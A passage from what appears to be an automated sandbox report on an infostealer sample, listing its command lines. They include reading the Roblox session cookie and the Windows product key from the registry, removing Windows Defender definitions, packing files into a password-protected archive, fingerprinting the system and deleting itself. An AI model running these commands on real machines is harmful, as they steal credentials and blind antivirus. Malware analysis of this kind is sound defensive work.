HkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	10:18:10
Start date:	06/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff75f390000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	10:18:10
Start date:	06/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff75d3f0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	10:18:11
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	10:18:11
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	10:18:11
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4276, Parent PID: 7596

General

Target ID:	74
Start time:	10:18:11
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	10:18:11
Start date:	06/01/2025
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff606800000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	10:18:11
Start date:	06/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff75f390000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	10:18:12
Start date:	06/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
Imagebase:	0x7ff65f8f0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	10:18:12
Start date:	06/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB5E2.tmp" "c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP"
Imagebase:	0x7ff7b1b10000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	10:18:12
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	10:18:12
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6720, Parent PID: 6420

General

Target ID:	81
Start time:	10:18:12
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	10:18:12
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	10:18:13
Start date:	06/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff75f390000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	10:18:13
Start date:	06/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff75d3f0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	10:18:14
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 8084, Parent PID: 6048

General

Target ID:	86
Start time:	10:18:14
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7820, Parent PID: 8084

General

Target ID:	87
Start time:	10:18:14
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	10:18:14
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	10:18:15
Start date:	06/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff75f390000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	10:18:15
Start date:	06/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff78c900000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	10:18:15
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6644, Parent PID: 7408

General

Target ID:	92
Start time:	10:18:15
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	10:18:15
Start date:	06/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff75f390000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	10:18:19
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	10:18:19
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	10:18:19
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	10:18:20
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	10:18:20
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	10:18:20
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff632ac0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	10:18:23
Start date:	06/01/2025
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff7eedd0000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	10:18:29
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	10:18:29
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	10:18:29
Start date:	06/01/2025
Path:	C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *
Imagebase:	0x7ff6185c0000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	10:18:31
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	10:18:31
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	10:18:31
Start date:	06/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff6c8e70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	10:18:32
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff6068e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	10:18:32
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	10:18:32
Start date:	06/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff6c8e70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	10:18:33
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7360, Parent PID: 7924

General

Target ID:	111
Start time:	10:18:33
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	112
Start time:	10:18:33
Start date:	06/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff6c8e70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	113
Start time:	10:18:34
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	114
Start time:	10:18:34
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	115
Start time:	10:18:34
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	116
Start time:	10:18:35
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7412, Parent PID: 6112

General

Target ID:	117
Start time:	10:18:35
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	118
Start time:	10:18:35
Start date:	06/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6c8e70000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	119
Start time:	10:18:36
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	120
Start time:	10:18:36
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	121
Start time:	10:18:36
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	122
Start time:	10:18:39
Start date:	06/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe""
Imagebase:	0x7ff635b70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	123
Start time:	10:18:39
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	124
Start time:	10:18:39
Start date:	06/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 3
Imagebase:	0x7ff795a50000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	79

Executed Functions

Function 00007FF6E60C6370 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6E60C63B5

Part of subcall function 00007FF6E60C5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5D1C

Part of subcall function 00007FF6E60BAF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF22
Part of subcall function 00007FF6E60BAF0C: GetLastError.KERNEL32(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF2C

Part of subcall function 00007FF6E60BAEC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6E60BAEA3,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BAECD
Part of subcall function 00007FF6E60BAEC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6E60BAEA3,?,?,?,?,?,00007FF6E60B30CC), ref: 00007FF6E60BAEF2

_get_daylight.LIBCMT ref: 00007FF6E60C63A4

Part of subcall function 00007FF6E60C5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5D7C

_get_daylight.LIBCMT ref: 00007FF6E60C661A
_get_daylight.LIBCMT ref: 00007FF6E60C662B
_get_daylight.LIBCMT ref: 00007FF6E60C663C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6E60C687C), ref: 00007FF6E60C6663

Strings

Eastern Summer Time, xrefs: 00007FF6E60C6721
Eastern Standard Time, xrefs: 00007FF6E60C6709

Memory Dump Source

Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true

